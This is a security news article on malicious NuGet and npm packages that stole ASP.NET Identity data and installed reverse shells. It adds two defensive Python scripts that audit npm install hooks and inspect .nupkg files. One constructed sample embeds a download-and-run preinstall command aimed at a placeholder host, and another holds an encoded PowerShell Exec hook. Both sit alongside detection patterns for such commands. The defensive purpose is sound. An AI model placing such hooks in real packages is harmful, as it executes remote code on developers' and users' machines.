Malicious NuGet Packages Stole ASP.NET Data
Malicious NuGet packages stole ASP.NET data in a recent software supply chain attack. Researchers discovered four harmful packages published to the NuGet registry and aimed at developers working on ASP.NET web application projects. The developers were only the delivery path: the real goal was to compromise the applications built with those packages once they were deployed.
According to the security report, the campaign stole ASP.NET Identity data, the framework's store of user accounts, role assignments and permission mappings. With that data the attackers gained deep insight into, and control over, the applications' access control systems.
The affected packages were NCryptYo, DOMOAuth2_, IRAOAuth2.0 and SimpleWriter_. Each looked legitimate at first glance but contained hidden malicious functions. Before they were removed, the packages recorded over 4,500 downloads.
Multi-Stage Attack Through NuGet Packages
NCryptYo acted as the first-stage dropper. Once a developer added it to a project, the package ran automatically, installed hidden hooks in the runtime environment, and then decrypted and deployed a second-stage payload.
That payload started a local proxy server which relayed traffic to an attacker-controlled command-and-control server. The server address was resolved dynamically at runtime rather than hard-coded, which made static detection and blocklisting harder.
Once the proxy was running, the other packages activated. DOMOAuth2_ and IRAOAuth2.0 sent the harvested Identity data out through the proxy, and the command server answered with altered authorization rules, allowing the attackers to modify the application's access controls remotely.
Backdoors and Persistent Control
The malicious server sent instructions to grant administrative privileges: it could assign new roles to attacker-controlled accounts and disable certain security checks. The result was a persistent backdoor inside the application.
SimpleWriter_ added further risk. Although it claimed to offer PDF features, it allowed arbitrary file writes on the host and launched hidden processes without the user's knowledge.
Researchers noted that the campaign targeted the applications that consumed the packages rather than developer machines. A compromised dependency travelled with the application into production, so once deployed it gave the attackers access to live environments.
npm Package Dropped Cross-Platform Malware
In a related case, a malicious npm package named ambar-src targeted developers and gathered over 50,000 downloads before removal. It abused npm's preinstall lifecycle script, which npm runs automatically during installation, so the malicious code executed as soon as the package was installed, without any call from the developer's own code.
On Windows it downloaded an executable that decrypted shellcode in memory. On Linux it ran a bash script that installed a reverse shell. On macOS it deployed a JXA (JavaScript for Automation) agent for the Mythic command-and-control framework.
The malware performed reconnaissance, stole browser data and captured system passwords using fake credential prompts. It sent the collected data to a cloud-hosted domain so that the exfiltration blended in with traffic to trusted services. Experts warned that any system on which the package ran must be treated as fully compromised: removing the package alone does not undo the reverse shell or agent it installed, and the attackers may retain hidden access.
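The preinstall hook described above is the interesting part for a defender: npm runs preinstall, install and postinstall scripts of every dependency during npm install, so a single line in a package.json is enough to execute code on the developer's machine. The following script is an added example, not code from the article or from any of the packages it names. It walks a node_modules tree, lists every package that declares one of those automatic hooks, and flags commands that look like a downloader or dropper (curl or wget, piping into a shell, PowerShell, base64 decoding, inline node code). The three sample packages it builds in a temporary directory are constructed for the example and their names are hypothetical.

```python
"""Audit npm packages for lifecycle scripts that run automatically on install.

Added example, not code from the original article. The sample package tree
built by build_sample_tree() is constructed here; the package names in it are
hypothetical and are not the packages discussed in the article.
"""
import json
import os
import re
import tempfile

# Lifecycle events npm runs for every dependency during `npm install`
# (unless installation is run with --ignore-scripts).
AUTO_RUN_HOOKS = ("preinstall", "install", "postinstall")

# Heuristics for commands that fetch or decode a payload rather than build code.
SUSPICIOUS = [
    (re.compile(r"\bcurl\b|\bwget\b"), "downloads a remote file"),
    (re.compile(r"\|\s*(ba)?sh\b"), "pipes into a shell"),
    (re.compile(r"powershell|pwsh", re.I), "invokes PowerShell"),
    (re.compile(r"base64|atob\(|Buffer\.from\([^)]*base64"), "decodes base64 content"),
    (re.compile(r"node\s+-e\b|eval\("), "runs inline code"),
]


def audit_package_json(path):
    """Return one finding per automatic hook declared in a package.json."""
    with open(path, encoding="utf-8") as fh:
        meta = json.load(fh)
    findings = []
    for hook in AUTO_RUN_HOOKS:
        cmd = meta.get("scripts", {}).get(hook)
        if not cmd:
            continue
        reasons = [why for rx, why in SUSPICIOUS if rx.search(cmd)]
        findings.append({
            "package": meta.get("name", "?"),
            "version": meta.get("version", "?"),
            "hook": hook,
            "command": cmd,
            "reasons": reasons,
        })
    return findings


def audit_node_modules(root):
    """Walk a directory tree and collect findings, most suspicious first."""
    results = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" in filenames:
            results.extend(audit_package_json(os.path.join(dirpath, "package.json")))
    return sorted(results, key=lambda f: (-len(f["reasons"]), f["package"]))


def build_sample_tree():
    """Constructed sample: a benign native build step, a dropper-style hook,
    and a package with no install-time scripts at all."""
    root = tempfile.mkdtemp(prefix="nm-audit-")
    samples = {
        "safe-native": {"name": "safe-native", "version": "1.0.0",
                        "scripts": {"install": "node-gyp rebuild"}},
        "evil-loader": {"name": "evil-loader", "version": "0.2.1",
                        "scripts": {"preinstall": "curl -s http://example.invalid/s.sh | bash"}},
        "plain-lib": {"name": "plain-lib", "version": "2.3.0",
                      "scripts": {"test": "jest"}},
    }
    for name, meta in samples.items():
        pkg_dir = os.path.join(root, "node_modules", name)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(meta, fh)
    return root


if __name__ == "__main__":
    for f in audit_node_modules(build_sample_tree()):
        flag = "SUSPICIOUS" if f["reasons"] else "review"
        print(f"[{flag}] {f['package']}@{f['version']} {f['hook']}: {f['command']}")
        for reason in f["reasons"]:
            print(f"    - {reason}")
```

Run it against a real project by passing the project's node_modules directory to audit_node_modules. A native module such as the safe-native sample legitimately needs an install hook, so the script reports every hook and only escalates the ones whose command matches a downloader pattern; the absence of a match is not proof of safety, because a package can hide the same behaviour inside a required JavaScript file.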
How to Prevent Supply Chain Attacks
Developers should review third-party packages before installing them: verify the publisher, inspect the package contents for install-time hooks (npm lifecycle scripts, NuGet build files and PowerShell scripts) and question any behaviour unrelated to the package's stated purpose. Installing with scripts disabled (npm install --ignore-scripts, or ignore-scripts=true in .npmrc) stops npm lifecycle hooks from running automatically. Teams should also monitor outbound traffic from build servers and deployed applications for connections to unknown destinations, which is how hidden proxies and data exfiltration surface early.
Organizations can add managed detection and response services that analyse suspicious runtime activity in real time, and regular vulnerability assessments to identify risky dependencies in development pipelines. Combining dependency scanning with continuous monitoring reduces the risk posed by malicious NuGet and npm packages.
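The article does not say which mechanism the NuGet packages used to run automatically, so the check below does not try to reproduce them. Instead it is an added example, not code from the article or the packages it names, of the inspection step recommended above: it opens a .nupkg (a zip archive) and enumerates the places NuGet will execute without any call from the consuming project. Those are the build/ and buildTransitive/ .props and .targets files that MSBuild imports automatically (the latter even into projects that only reference the package transitively), and the legacy tools/init.ps1, install.ps1 and uninstall.ps1 scripts run by the Visual Studio Package Manager Console. For auto-imported MSBuild files it also reports Exec and UsingTask elements, which run a command or load a task assembly at build time. The sample package is constructed in memory with the hypothetical id Demo.Widget.

```python
"""Inspect a .nupkg for content that runs automatically on restore, build or load.

Added example, not code from the original article. build_sample_nupkg()
constructs a package with the hypothetical id Demo.Widget for the demo; the
encoded command in it is a placeholder, not a real payload.
"""
import io
import re
import zipfile

# MSBuild imports build/<id>.props, build/<id>.targets and the same files under
# buildTransitive/ automatically when the package is referenced.
AUTO_IMPORT_DIRS = ("build/", "buildtransitive/")
# Legacy PowerShell hooks executed by the Visual Studio Package Manager Console.
LEGACY_PS_HOOKS = ("tools/init.ps1", "tools/install.ps1", "tools/uninstall.ps1")
# Elements in an auto-imported MSBuild file that spawn a process (Exec) or
# load arbitrary task code (UsingTask).
EXEC_TASKS = re.compile(r"<\s*(Exec|UsingTask)\b", re.I)


def inspect_nupkg(data: bytes):
    """Return a list of (path, reason) findings for the package bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            lower = name.lower()
            if lower in LEGACY_PS_HOOKS:
                findings.append((name, "legacy PowerShell hook run by Package Manager Console"))
            elif lower.endswith(".ps1"):
                findings.append((name, "PowerShell script shipped in package"))
            if lower.startswith(AUTO_IMPORT_DIRS) and lower.endswith((".targets", ".props")):
                body = zf.read(name).decode("utf-8", errors="replace")
                match = EXEC_TASKS.search(body)
                if match:
                    findings.append((name, f"auto-imported MSBuild file contains <{match.group(1)}> task"))
                else:
                    findings.append((name, "auto-imported MSBuild file (review contents)"))
    return findings


def build_sample_nupkg(package_id="Demo.Widget"):
    """Constructed sample: a library DLL plus a .targets that runs a command before Build."""
    targets = """<Project>
  <Target Name="DemoHook" BeforeTargets="Build">
    <Exec Command="powershell -enc QQBCAEMA" />
  </Target>
</Project>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(f"{package_id}.nuspec",
                    f"<package><metadata><id>{package_id}</id></metadata></package>")
        zf.writestr(f"lib/net8.0/{package_id}.dll", b"MZ")  # placeholder, not a real PE
        zf.writestr(f"build/{package_id}.targets", targets)
        zf.writestr("tools/init.ps1", "Write-Host 'hello'")
    return buf.getvalue()


if __name__ == "__main__":
    for path, reason in inspect_nupkg(build_sample_nupkg()):
        print(f"{path}: {reason}")
```

To use it on a package from a feed, pass the bytes of the downloaded .nupkg (or of the file cached under ~/.nuget/packages/<id>/<version>/) to inspect_nupkg. A .targets file with an Exec task is normal for some native-interop packages, so treat the output as a review list rather than a verdict, and compare what the build file does with what the package claims to be for.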
Sleep well, we got you covered.

